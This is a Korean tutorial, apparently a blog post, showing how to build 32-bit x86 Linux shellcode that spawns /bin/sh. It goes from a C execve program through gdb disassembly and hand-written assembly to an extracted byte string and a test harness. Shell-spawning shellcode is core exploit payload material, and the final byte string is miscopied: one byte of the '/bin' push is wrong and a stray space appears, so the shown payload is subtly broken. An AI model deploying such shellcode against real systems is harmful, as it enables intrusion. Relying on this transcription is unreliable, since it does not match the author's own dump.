쉘코드 만들기 ( /bin/sh )

/bin/sh를 실행 시켜주는 쉘코드 만들기


#include <unistd.h> int main() { char* str[2]; str[0] = "/bin/sh"; str[1] = NULL; execve("/bin/sh", str, NULL); }


여기서 system("/bin/sh")로 해결하지 않은 이유는 , printf 함수와 마찬가지로 system함수 또한 execve함수를 내부적으로 수행하기 때문에 execve() 를 이용하여 쉘코드를 작성하였다.

# gcc -o execve execve.c -static

-static 옵션을 통하여 execve함수 내부까지 어셈블리어를 더 자세히 볼 수 있다.

gdb를 통하여 main 부분을 확인하면 아래와 같다.

(gdb) disassemble main<br /> Dump of assembler code for function main:<br /> 0x08048328 <main+0>:     push   %ebp 0x08048329 <main+1>:     mov    %esp,%ebp 0x0804832b <main+3>:     sub    $0x8,%esp 0x0804832e <main+6>:     and    $0xfffffff0,%esp 0x08048331 <main+9>:     mov    $0x0,%eax 0x08048336 <main+14>:     sub    %eax,%esp 0x08048338 <main+16>:     movl   $0x804840c,0xfffffff8(%ebp) 0x0804833f <main+23>:     movl   $0x0,0xfffffffc(%ebp) 0x08048346 <main+30>:     sub    $0x4,%esp 0x08048349 <main+33>:     push   $0x0   ** 0x0804834b <main+35>:     lea    0xfffffff8(%ebp),%eax 0x0804834e <main+38>:     push   %eax   ** 0x0804834f <main+39>:     push   $0x804840c   ** 0x08048354 <main+44>:     call   0x8048258 <execve> 0x08048359 <main+49>:     add    $0x10,%esp 0x0804835c <main+52>:     leave 0x0804835d <main+53>:     ret   0x0804835e <main+54>:     nop   0x0804835f <main+55>:     nop   End of assembler dump.

| 0x804840c | eax | 0x0 | dummy(4) | 0x804840c | 0x0 | sfp | ret |



다음 execve 함수 부분을 disassemble 해보자.

<br /> (gdb) disassemble execve Dump of assembler code for function execve: 0x0804d9f0 <execve+0>:     push   %ebp 0x0804d9f1 <execve+1>:     mov    $0x0,%eax 0x0804d9f6 <execve+6>:     mov    %esp,%ebp 0x0804d9f8 <execve+8>:     test   %eax,%eax 0x0804d9fa <execve+10>:     push   %edi 0x0804d9fb <execve+11>:     push   %ebx 0x0804d9fc <execve+12>:     mov    0x8(%ebp),%edi    0x0804d9ff <execve+15>:     je     0x804da06 <execve+22> 0x0804da01 <execve+17>:     call   0x0 0x0804da06 <execve+22>:     mov    0xc(%ebp),%ecx    0x0804da09 <execve+25>:     mov    0x10(%ebp),%edx    0x0804da0c <execve+28>:     push   %ebx 0x0804da0d <execve+29>:     mov    %edi,%ebx    0x0804da0f <execve+31>:     mov    $0xb,%eax    0x0804da14 <execve+36>:     int    $0x80    0x0804da16 <execve+38>:     pop    %ebx 0x0804da17 <execve+39>:     cmp    $0xfffff000,%eax 0x0804da1c <execve+44>:     mov    %eax,%ebx 0x0804da1e <execve+46>:     ja     0x804da26 <execve+54> 0x0804da20 <execve+48>:     mov    %ebx,%eax 0x0804da22 <execve+50>:     pop    %ebx 0x0804da23 <execve+51>:     pop    %edi 0x0804da24 <execve+52>:     leave 0x0804da25 <execve+53>:     ret   0x0804da26 <execve+54>:     neg    %ebx 0x0804da28 <execve+56>:     call   0x8048600 <__errno_location> 0x0804da2d <execve+61>:     mov    %ebx,(%eax) 0x0804da2f <execve+63>:     mov    $0xffffffff,%ebx 0x0804da34 <execve+68>:     jmp    0x804da20 <execve+48> 0x0804da36 <execve+70>:     nop   0x0804da37 <execve+71>:     nop   End of assembler dump.
핵심 부분을 정리하면 아래와 같이 정리가 가능하다.

edi = 0x804840c
ecx = [ebp-8] 주소
edx = 0x0
ebx = edi = 0x804840c
eax = 0xb

참조하여 쉘코드를 작성

.globl main main: xorl %eax, %eax push %eax // /bin/sh 의 문자열 끝 push $0x68732f2f // /sh push $0x6e69622f // /bin movl %esp, %ebx //현재 스택의 esp부분을 ebx에 넣음 push %eax /*C코드에 str 부분 push %ebx */ movl %esp, %ecx //ecx에 str 포인터 배열의 주소 넣기 movl %eax, %edx // NULL movb $0xb, %al //eax에 시스템콜 할 때 필요한 인자 주기, 11은 execve 함수 콜! int $0x80 //인터럽트 <br />
컴파일은 아래와 같은 과정으로 진행하면 된다.
as -o execve1.obj execve.s                       // 어셈블리파일 obj 파일 생성
gcc -o execve1 execve1.obj                      //obj파일을 실행파일로 만듬
./execve1                                             //실행

objdump를 사용하여 dump한다(-d옵션)
그럼 아래와 같은 메인 부분을 확인 할 수 있다.

080482f4 <main>: 80482f4: 31 c0 xor %eax,%eax 80482f6: 50 push %eax 80482f7: 68 2f 2f 73 68 push $0x68732f2f 80482fc: 68 2f 62 69 6e push $0x6e69622f 8048301: 89 e3 mov %esp,%ebx 8048303: 50 push %eax 8048304: 53 push %ebx 8048305: 89 e1 mov %esp,%ecx 8048307: 89 c2 mov %eax,%edx 8048309: b0 0b mov $0xb,%al 804830b: cd 80 int $0x80 804830d: 90 nop 804830e: 90 nop 804830f: 90 nop <br />

shellcode : \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x62\x89\xe3\x50\x53\x89\xe1
\x89\xc2\xb0\x0b\xcd\x80

char *shell = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x62\x89\xe3\x50\x53\x89\xe1 \x89\xc2\xb0\x0b\xcd\x80"; int main(){ void(*func)(void); func = (void*)shell; func(); }